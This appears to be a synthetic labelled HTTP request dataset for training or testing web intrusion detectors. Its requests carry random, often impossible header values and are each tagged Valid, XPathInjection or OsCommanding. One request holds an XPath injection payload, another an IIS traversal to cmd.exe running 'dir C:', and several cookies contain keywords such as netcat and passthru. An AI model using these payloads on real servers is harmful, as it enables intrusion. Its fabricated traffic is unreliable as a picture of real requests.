Authorization: Basic UGFSdGllOm9kZWVlcg==
Range: 56-,93-190,-3
Referer: http://oira.fr/0sgeolSA/A0tora.png
TE: chunked,trailers
Trailer: Referer
User-Agent: pewdee (eqg0qZa; aiI3Fh; aNZDKHVPv; lCXksVwaI7; tXf_0DrI)
UA-CPU: MIPS
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 639x0428
Via: HTTP/7.8 www.a8hfir.html, 1.6 103.194.193.9:355
Transfer-Encoding: compress
Upgrade: Af8ah/1.2, 4hcaa/6.7, nfrelo/4.7, hca/1.7
Warning: 519 www.gtsm.gif "ueig4ostawratnEshj3i" "Sun, 02 Apr 06 10:02:56 UTC"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3367
Start - Id: 29720
class: Valid
GET /ePuKR/sLidm8iooaDfaeo5/MP/tsocayx.html?nt5anua1hAesnbt=2805&nauHcpnysue=Jorbz07&sh=tinbuei6 HTTP/1.1
Host: 237.157.11.174
Connection: taueewiz
Accept: */*
Accept-Charset: iso-8859-4;q=0.3, utf-7;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 193.153.56.245
Cookie: lh.hinO=GhiiofsJyfdhegdaec;fydrtvien8olh=aehh-tg8
Cookie2: $Version="5"
Date: Mon, 16 Feb 09 24:47:09 UTC
ETag: W/"exghmn3QI5.fS-n"
Expect: 100-continue
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Mon, 21 Dec 09 18:33:55 CET
If-Unmodified-Since: Tue, 01 Sep 09 02:48:02 GMT
If-Match: "-npcYNkrH8Kp5-qOUr6n"
If-None-Match: "jNPApRRC47z9xA.QwjQP"
If-Range: "p-zcOFBHmdnG2F5H"
Max-Forwards: 440
MIME-Version: 3.4
Pragma: wteyt='eetininn'
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ootai ytrdsee=hhwhfeo
Range: 229-9780
Referer: /usatf/emeiue3.jsp
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: nwetlreuw/9.5.5.9.8
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 456x1261
Via: FTP/0.4 151.45.65.74:201, 9.1 84.69.74.205
Transfer-Encoding: gzip
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 2911766071168
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29720
Start - Id: 48825
class: XPathInjection
GET /dablihf/ssvmrgsqtheei8e7cs/eIGt--m/ertvOaImochaKechoEj-.gif?S6=325508004&esutz=c7j&tsomrupao9sa=Ldpe%27++or++++1%3C++ho%2Folo4Or%2Fn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+++++or+++++%27p3iwNN%27++%3D++%27 HTTP/1.1
Host: www.reatCt.fr
Connection: mFndace
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, compress;q=0.1, deflate;q=0.0, identity
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: elzdbakei=096;YWlinkWuF8g.ws=dxtermvoasystemerTkea =o
Cookie2: $Version="352"
Date: Fri, 03 Mar 06 06:16:43 GMT
ETag: W/"HxRplA_cWdZdDiPv"
Expect: e7qaEu=rrl3lo
From: 18kll@eaes.it
If-Modified-Since: Sun, 27 Jul 08 13:46:20 UTC
If-Unmodified-Since: Mon, 23 Nov 09 08:01:33 GMT
If-Match: "W@NPrxNgBkspdMT"
If-None-Match: *
If-Range: *
Max-Forwards: 8789
MIME-Version: 7.6
Pragma: Aptq='dF'
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest qop=auth-int
Range: 5920-3
Referer: /qehMz6t/kalcyhm5/mnxa.css
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/6.5 (compatible; MSIE 6.8; WinNT; eaaS)
UA-CPU: StrongARM
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 5.8 140.74.219.98, 4.6 www.tsniwcz.shtml
Transfer-Encoding: compress
Upgrade: ej6ash/0.0, c8tth/2.4, aem/9.4, atomei/2.3, cwtgw/0.9
Warning: 888 57.174.35.186 "l3aT4eMc1oeMeeesb" 
X-Forwarded-For: 195.79.63.112
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48825
Start - Id: 43860
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: 2.143.21.0:80
Connection: close
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: h='e'
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="8"
Date: Wed, 18 Mar 09 12:13:39 UTC
ETag: "HEbQ33-SkVt2EnOI24b"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: "iKysEnX1om9AoSfLW9"
If-Range: Mon, 14 Feb 05 16:08:00 GMT
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Digest qop=tTfrtNsH
Range: 064373-124259,214-265,801-679
Referer: /iNo9s/otvplr.asmx
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 5.3; ee-da; rv:0.2.5) Gecko/61616524
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 623 www.ednk.css "ctoro1sddstfeDiliter" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43860
Start - Id: 31607
class: Valid
GET /ahPOFiwodK/ejl7m/aaiat/2btsaiqebto/e.HcT/TfZ/nVxiY0/s3ggeoc/onausiXiied/nchbouwaa1/sGJZT7x.php?aEulTatmoSceat=+%40+o7adrctecwp-&etHtboxnRs=IbsZ&norrttwR=7z%3Finputt+r9n8h7lbodyd&ehaonciyltneb=mQxM5Z&toh=e%3F+aeP%3E4+er%7Clo&dbgy7twetos=57&FQ1TIgg=%2Fa0ia&i1eSw=281483&kdKltds=x%5D&B.5xSLzSP=betweend+fhlo&n1oeuhh=+yaT&dblnitheg=feawsa%2FooDmrno7&@2JC=yOa2&wnfcnttnemLta=ase3e&EeihIn=tnkqnncmtt HTTP/1.1
Host: www.slA5e7T.biz
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 160.28.85.154
Cookie: Htn=03;ijeDnaossucE=u ;bgsound0paccess_logsystemdocument9n=0IJ8faYRYH;cunetu5=359945664;z4rmdnsnt8=283
Cookie2: $Version="624"
Date: Thu, 20 Mar 08 17:56:00 UTC
ETag: W/"8r1Zzj-ksustnrm0dQ"
Expect: jitts9
From: Seenwnj@easRlfj.biz
If-Modified-Since: Wed, 14 Apr 04 20:31:08 GMT
If-Unmodified-Since: Mon, 08 Feb 10 05:46:21 GMT
If-Match: *
If-None-Match: *
If-Range: "J2iCRI_nkp-74M60Wk"
Max-Forwards: 17
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest response="FD8ADbEE2Add907cB1Da0CFF05F24cbe"
Authorization: Digest nonce
Range: -96734,-3593,7159-
Referer: /etrsnn/notsoeoo.jpg
TE: deflate,trailers,trailers
Trailer: Upgrade
User-Agent: gn7e (9mUEIUKx; d_xDWg; no3cleo)
UA-CPU: PowerPC
UA-Disp: 4808,8139,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3066x402
Via: 6.2 169.238.249.23:42
Transfer-Encoding: etere; eottz=NNcn6htm
Upgrade: dmyle/0.4, eeo/3.5
Warning: 137 244.132.47.139 "naatanasiuutzeseht" "Tue, 25 Mar 08 09:31:18 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 0401197153932
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31607
Start - Id: 25797
class: Valid
GET /2cIpMNv8SlmJRyw8MoW/lnvw5Oq/erLr.shtml?ttns=f0coeeCeprocessing-instruction%3Cnaj73UE4%26&4oyhueds7eet=mR%40WDgWoSkT&ORW4PATgoM=140 HTTP/1.0
Host: 186.110.73.205
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress
Accept-Language: 3Siob-efd, ttndn-7qE7ho5t, eifh-ume
Cache-Control: no-transform
Client-ip: 125.157.125.55
Cookie: ocIkYuIEaiefV=357521;Hm6=85432437;nabptf=308861;s3aawre7w7=4650547
Cookie2: $Version="1"
Date: Sat, 20 Oct 07 21:49:28 GMT
ETag: W/"am6UHqCkgy34o1ENI1z"
Expect: 9tpeowE2
From: wcr0oelc@nhee9nt.fr
If-Modified-Since: Fri, 11 Jul 08 22:36:16 UTC
If-Unmodified-Since: Tue, 13 Sep 05 07:03:38 CET
If-Match: "htejDvvkKVFGVaViP"
If-None-Match: "V1MxnPymPrzM2nbMkEk"
If-Range: Thu, 26 Oct 06 06:31:36 CET
Max-Forwards: 1
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aG8zYXJPYjplaHV4bw==
Authorization: NTLM c25UeFJ1Mmh3eWlpcHNjZG5zcG9vdGxudE5kYjVlaGV5ZzJlZWV1c2VVN28=
Range: 644-,-02
Referer: /nfoe/rtueka.exe
TE: trailers,deflate,gzip;q=0.6
Trailer: If-Range
User-Agent: Mozilla/7.6 (X11; U; Open BSD i386 6.1; ye-so; rv:2.3.9) Gecko/14700001
UA-CPU: PowerPC
UA-Disp: 7806,6470,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: HTTP/8.6 71.101.100.62
Transfer-Encoding: identity
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 065 www.kyttnBu.html:02 "aeyhhShlroEc" 
X-Forwarded-For: 186.228.205.221
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25797
Start - Id: 513
class: Valid
GET /akl/idessttoyh6tda/Qhs2ihrpfeheOaee8/1ne8eise8soedgt/d30VFQOOS.9i5XP/MkD/rA0tnio/s0III89GJGkpHMf/smrneu/fsmmhdhhhs.cgi?leddemoi1m7=aX8gQp98amLv&dnee3opLp=hrmetagyrFaobhsqs&zoghHNaiast=%29d&eepeu0EUlcInaea=b&qena=8820015 HTTP/1.1
Host: 87.207.52.251:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.5, identity, deflate;q=0.6
Accept-Language: ssT-s8dlr, sntnty-Noe3t
Cache-Control: no-transform
Client-ip: 133.168.110.42
Cookie: nve=fgpjkebb5;lqanngOesftoon=fyc;aopnat=48358172;e1ln=spnzhttk;oodpnrordsr1tho=t
Cookie2: $Version="487"
Date: Fri, 30 Mar 07 22:31:55 CET
ETag: W/"qmPRCaGmEOHB-JKz273d"
Expect: aorh
From: Csuh@ese7nna.be
If-Modified-Since: Wed, 23 Apr 08 24:21:33 GMT
If-Unmodified-Since: Sun, 25 Apr 04 12:36:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Dec 06 18:28:45 CET
Max-Forwards: 9
MIME-Version: 0.3
Pragma: ekis='Oosndmi'
Proxy-Authorization: Basic ZW4yaWVhOm90ZFNv
Authorization: Basic Y2V3c2liY2M6dGFwbm4=
Range: 8-08055,3-
Referer: /ooynr/9tmNEe.css
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.1 (X11; U; Open BSD i386 2.6; cb-ae; rv:0.6.8) Gecko/04437377
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: 1.0 www.naewt.shtml:09, 2.0 www.tiemy.jpg:9982
Transfer-Encoding: identity
Upgrade: 581r/9.4, euqs/4.6, ehl/3.1, uoE/5.0
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 2.115.5.51
X-Serial-Number: 35520
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 513
Start - Id: 32520
class: Valid
GET /ebj/cqoo/gnNiTept/s0nu7iffh2mtssr/ne9syq2X.rWJQvLXbpc/u4sjN9t.png?schetsfndeueeh=dqtcwha&h2R8IQUiF=3860377325&ostaanWniShpro=2&ayel1d=0929779&apbcopyeWU2Iad@=ented6potim8h1t HTTP/1.0
Host: www.iasatso.be
Connection: keep-alive
Accept: audio/*, image/*;q=0.1
Accept-Charset: windows-1252;q=0.3, x-mac-arabic;q=0.0, iso-8859-15, ks_c_5601-1987;q=0.1
Accept-Encoding: deflate;q=0.6, gzip;q=0.0, compress, identity, deflate;q=0.9
Accept-Language: 7woas-w;q=0.7, rDeeeR-etRl9hs;q=0.3
Cache-Control: no-transform
Client-ip: 38.168.130.31
Cookie: x2butxV8Vt9am=W;arnorecjiinGni=wcfhau5ki\[sgpx;rt04eisvhso=30543;3erwgyllneayt=101194281;t0ttptash=wi2dnaaiisitns
Cookie2: $Version="46"
Date: Wed, 16 Jan 08 14:04:17 CET
ETag: W/"VF88jkbQiAvUh-."
Expect: gditEiD=ponr;eoaBonao
From: arer@q1ecihst.ch
If-Modified-Since: Thu, 04 Feb 10 06:34:29 UTC
If-Unmodified-Since: Tue, 10 May 05 08:58:22 GMT
If-Match: "ca5XEYTtnJVPso@Ad"
If-None-Match: *
If-Range: *
Max-Forwards: 5949
MIME-Version: 5.5
Pragma: tosM=nrd
Proxy-Authorization: Basic OWRhYWd3b0Y6Nm1uaXNwdA==
Authorization: Digest username="gayacct"
Range: -202408,-140279,279-
Referer: http://www.Odao5ni.be/inoaefd.cgi
TE: trailers
Trailer: User-Agent
User-Agent: amtsomTiho
UA-CPU: PowerPC
UA-Disp: 411,220,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5706x229
Via: FTP/0.6 www.ntheor.html, 6.3 41.68.176.240, 6.9 www.owfdeabr.js
Transfer-Encoding: tqrtas
Upgrade: ajrIgd/6.3, orleV/5.0
Warning: 704 www.mieshurb.css "rmlguy7" 
X-Forwarded-For: 10.109.104.13
X-Serial-Number: 31593732
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32520
Start - Id: 306
class: Valid
GET /eeshatvoeetrjvc7ii/rrzAo79YBz.9L43/2enhtgzsyaNeseraod6/3j3CFVCXechoNy1EN/omhoOnemaclsnvo/ontllhteih0ereaes.png?HZWX2=1497&feoa0ouEr=moelaf8RzVeohoa&nteWnitthuoraet=10355334&Nahy82cM=%3Fd%27d3tb2ng+fi+ohselectobject&oitj6naSif8t=fEs9Hssan&ysq=fk%5Ci&crqelamieyKbl=381008 HTTP/1.1
Host: www.tdmdsliib.st
Connection: dt9nog
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish
Accept-Encoding: identity;q=0.7
Accept-Language: ahomone-yzt;q=0.1, z1-rdv, eotuc-eesL8
Cache-Control: max-stale=132
Client-ip: 157.214.192.75
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="39"
Date: Wed, 23 Aug 06 16:12:53 GMT
ETag: W/"5I-t-ACF@We_@x@jrE"
Expect: 100-continue
From: atOG@okZhh.fr
If-Modified-Since: Thu, 30 Aug 07 22:22:03 UTC
If-Unmodified-Since: Sun, 22 Jun 08 02:37:05 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 05
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic b2xhczpzbmlvb2lzbw==
Range: 018198-760671,-91
Referer: /yteen/a9eeao/cbwI.php4
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: ewu2Eewe/9.2.7.0.5
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4622x2387
Via: 8.9 188.139.96.159:09
Transfer-Encoding: compress
Upgrade: miT2r5/5.1
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 306
Start - Id: 17049
class: Valid
GET /VYzyx7i/a7gZqTr0vwwWa/ryiGAHV1jCk7kHS/qmvbscriptd/cr.tiff?hEhcME=994253&J-S4mail1=%26%5C1&lty=tSfin%2Bj+utrxN%2Bh3&eeTseG7bso=e833B&jiz=tCGo%40W&ejseeZb=eEn+%7C1imtforhsmum&rnakihs80Oi=aT1%406d34AV%40&aOyowha=e+e HTTP/1.1
Host: www.od69wTe.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=70123
Client-ip: 160.69.131.126
Cookie: opqn0gFaape=yelehri;e6dmookaen1irtt=65;0llbsma4sdc=passthruahe'oc netcat;apiolilwKehi=talhsstvtw2sam;tdeiaycieHtnu=0
Cookie2: $Version="838"
Date: Thu, 03 Nov 05 24:51:55 GMT
ETag: W/"bPLfPIaTYGq7m-KxD"
Expect: 100-continue
From: mbgys@xehcas.biz
If-Modified-Since: Sat, 23 Sep 06 05:57:02 CET
If-Unmodified-Since: Sun, 10 Jan 10 03:13:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 12 Jan 09 01:55:59 CET
Max-Forwards: 1
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic aHZzaGRuaU46cndvdGFk
Authorization: Digest opaque="dpde"
Range: -8,76-,81611-3201
Referer: /saeo/Dhma/aiaIr6w/asmn/dwoioa.mdb
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.5 (compatible; MSIE 7.4; Mac OS X; gEemhrcsdr; sErNoje)
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3768x758
Via: HTTP/0.7 116.222.77.121, HTTP/2.1 219.61.129.245, 9.1 www.0rhfose.png:57583
Transfer-Encoding: deflate
Upgrade: oiae/2.0, 2ohaei/3.7, Kead/8.1, tb5ex/6.1, hOAqi/1.3
Warning: 081 www.awrh.css "tsmF4p" "Sat, 07 Feb 09 11:32:07 GMT"
X-Forwarded-For: 185.99.110.242
X-Serial-Number: 88882390422538145
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17049
Start - Id: 30120
class: Valid
GET /ednnuc1soeefshetr/fhrsae1nmlsshoix/iyofReAaSNrH/z1K.tiff? HTTP/1.0
Host: 33.228.45.28
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=71004
Client-ip: 62.130.164.50
Cookie: IaigsAtlcnsedh=mohomeftptl't;euax=03410;Gavtoermsps=oBWbnHU8;enolnoata8a=itttethwwuodyh;yonTohytb=4008682
Cookie2: $Version="0"
Date: Tue, 01 Nov 05 17:58:31 CET
ETag: "6MwatW4h5STU1NagH"
Expect: 100-continue
From: eettdr7o@qfttmcl.uk
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Tue, 30 Jun 09 10:40:50 UTC
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: *
If-Range: Thu, 28 Jan 10 19:45:00 GMT
Max-Forwards: 6
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: Digest qop=oaitee
Range: -3400,603295-
Referer: /aglcs47/H7wg.php3
TE: gzip
Trailer: Date
User-Agent: Mozilla/8.2 (X11; U; Linux i386 3.3; np-ea; rv:4.8.9) Gecko/36649601
UA-CPU: Sparc
UA-Disp: 834,9850,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 146x988
Via: 7.5 www.pbtlsll5.html:0815, 2.3 61.51.127.101
Transfer-Encoding: identity
Upgrade: atUnh/6.9, c0y/8.9, Tr3Ld/2.0, m2seTE/9.9, df38/8.9
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 541000
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30120
Start - Id: 14203
class: Valid
GET /eXE6tTPYrkiovQ_eJ/formAdcatiVdT9U/rmsBThSa2Iv4hmPmQpDk.exe?o8ca0=Otoe0aliba%25t%5Cner%7CtaRso&bhg0dAshEietwn=wfmon&mmepnmatggosie=mT0egiframegs&goow=g9nr3dO6aaDiaoaeSs&Rcelsoe5drni7h=rtuEmInetEhomeivdn&msuetrli=hcCpC.&mkEaehAseqcoz=eJWX HTTP/1.0
Host: www.ntht.de:80
Connection: keep-alive
Accept: application/*, image/png;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: a-0ld;q=0.3, aeaEnrpd-lnmer, y-ct, liMtcdy-e6EH;q=0.6, mu1-t
Cache-Control: max-stale
Client-ip: 163.197.40.45
Cookie: 0xd=itoptalo opwrhh;fsso=7440;2olsurWorXkoaqs=2659211
Cookie2: $Version="456"
Date: Sun, 19 Aug 07 17:18:55 GMT
ETag: W/"4NEV@TBQoKP07UdrbFD"
Expect: tsTeh
From: hoeiim@ceoiedong.st
If-Modified-Since: Sun, 11 Jan 04 08:52:38 UTC
If-Unmodified-Since: Sun, 15 Aug 04 04:49:28 GMT
If-Match: *
If-None-Match: "TNK7CC-1GWxgb8FI6A2"
If-Range: "K3fy11Dyqn0KG_XQ"
Max-Forwards: 7
MIME-Version: 0.5
Pragma: cs3dyob6=tydtrzr
Proxy-Authorization: dndh ietm=rse69h3
Authorization: Digest username="weoteiw"
Range: 835-87
Referer: /2dooieo.tar.gz
TE: trailers
Trailer: Transfer-Encoding
User-Agent: tlhn9taLo/3.4.0.8
UA-CPU: x86
UA-Disp: 168,1348,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 962x171
Via: 9.0 www.mid6a.js, HTTP/6.4 139.113.123.167
Transfer-Encoding: deflate
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 631 173.31.157.130 "elNew" 
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 8726872524288200
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14203
Start - Id: 6844
class: Valid
PUT /f5YFWy6/a5lGEvGH/sTAmUUuxKWMQ/6qWe/effqFv0Vz@YPCA8/E.DZotyr._.zW9m/L2Tkcw95ruBLU/mH1/hhOdyprcvflOsawuttts/yE/-wIwp-sQM/sdel.jpg? HTTP/1.1
Content-Length: 92
Content-Language: Titt2it
Content-Encoding: deflate
Content-Location: /usaedd/4rasht/ivai1vS/aChe.htm
Content-MD5: cFdldGhDZ2JtdXJvVE9kcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Jul 09 08:23:13 GMT
Last-Modified: Fri, 24 Nov 06 15:25:55 UTC
Host: 143.147.212.122
Connection: h0wta89
Accept: */*
Accept-Charset: macintosh;q=0.3, iso-8859-8-i, hz-gb-2312;q=0.2, us-ascii;q=0.6, windows-1257
Accept-Encoding: compress, deflate;q=0.4
Accept-Language: tmrdibik-rRee
Cache-Control: only-if-cached
Client-ip: 26.175.54.181
Cookie: 1whereQiw=H;eer=06471561;genhnoi=coTwNpsl;mrn7C8naqae=4ye;atAhsqchALR=st2a$t inrctj
Cookie2: $Version="628"
Date: Sat, 18 Oct 08 17:55:30 UTC
ETag: "hSKggO8EGi-YJsqBw"
Expect: yOvyaad7=sere
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Wed, 08 Jul 09 13:58:20 GMT
If-Unmodified-Since: Mon, 29 Dec 08 23:58:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Dec 04 01:47:32 GMT
Max-Forwards: 334
MIME-Version: 7.3
Pragma: w='8riiba'
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest cnonce="aooac"
Range: 708-,54-
Referer: http://pdHo5nqt.biz/gl9ym.js
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.6 (Windows; U; Windows NT 6.0; Wo-zn; rv:5.1.2) Gecko/63515607
UA-CPU: 68000
UA-Disp: 0985,7140,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 302x0187
Via: HTTP/3.7 110.252.40.147, 4.6 165.98.214.129, 8.7 122.143.180.111
Transfer-Encoding: gzip
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 99955754
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pieCe3cseonrmeo=tupdateaa3z0oydxp_esgz&lo2enoouol= lN&js=8&Y6nsy4tN2l2nfm=stdin<lsaot4gsrn

End - Id: 6844
Start - Id: 7221
class: Valid
PUT /hx/A_zJciAyRp/oolarsdgvdsmnNixer.png? HTTP/1.0
Content-Length: 114
Content-Language: gbhis,1hc,qde
Content-Encoding: identity
Content-Location: /SueUi/xevi/anlRst/eilrf/pvStcje.jsp
Content-MD5: YXRNb29vY2dGYWV2ZXVBZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Sep 07 20:14:04 UTC
Last-Modified: Sat, 04 Feb 06 11:51:16 CET
Host: 150.111.5.13:80
Connection: IRle
Accept: */*
Accept-Charset: x-mac-arabic;q=0.2
Accept-Encoding: gzip;q=0.1, identity, deflate;q=0.9, deflate;q=0.4, gzip
Accept-Language: sp-ooiaairs;q=0.2, dipg-aril, Qh-3up, 7tgm-hime;q=0.6, hhr-aIsy;q=0.1
Cache-Control: max-stale=72
Client-ip: 83.132.90.202
Cookie: eAaoo0i0cbsu=874;he=cH: elmrfelh@;8tbrsO=EBbhzitE;ng=92;taO3raa3hrfm= ozexecdo2r p:3asmi
Cookie2: $Version="27"
Date: Sat, 14 May 05 10:15:51 UTC
ETag: "Rwm_MIb0XCKapKG6"
Expect: 100-continue
From: 9End@aiod4fee.uk
If-Modified-Since: Tue, 28 Nov 06 05:00:53 CET
If-Unmodified-Since: Thu, 26 Mar 09 18:08:37 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Jan 05 20:56:53 GMT
Max-Forwards: 5303
MIME-Version: 6.6
Pragma: mlinp=rn
Proxy-Authorization: NTLM aHN3NHJ6aXRlc3RlaW9zdGliaHZlbnVvY29vb2VuOWFrQTVzbnhjbnNobnYw
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: http://eoyLo2m.uk/epdolB/n7ykMh9e.msf
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (X11; U; Unix 6.2; m9-3n; rv:0.3.6) Gecko/40031251
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: 6mp/5.6 www.rTrs.html
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 559 61.31.135.187 "11oa2Jyriolu0wwt" 
X-Forwarded-For: 94.164.69.87
X-Serial-Number: 35067124458
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ttnl=6310&e5s07si4=s~ax&3sawf=10190075&iRoe=14236&asro=98158&ir3uniedtd=igee&hnifOorhepc6go=Nnbv&-uzpY=5KwKghl6y

End - Id: 7221
Start - Id: 29481
class: Valid
GET /8pTw6P/j5ryC5NyD0/evs-5/eiDituesiZseegpoZ/RB09miXr/pfMd9rEtvlolinsi/ncpP4/u7trfwerforSle/iweole2eDeohd6haX.jpeg? HTTP/1.1
Host: 181.190.252.36
Connection: close
Accept: */*;q=0.4
Accept-Charset: isiri-3342;q=0.6, isiri-3342, isiri-3342, x-mac-ce;q=0.0
Accept-Encoding: identity;q=0.7
Accept-Language: h-Ahet, hine-lks1e;q=0.6, nleoho-xa4Nn;q=0.1, qvetdh9-liePr;q=0.6
Cache-Control: max-stale=4
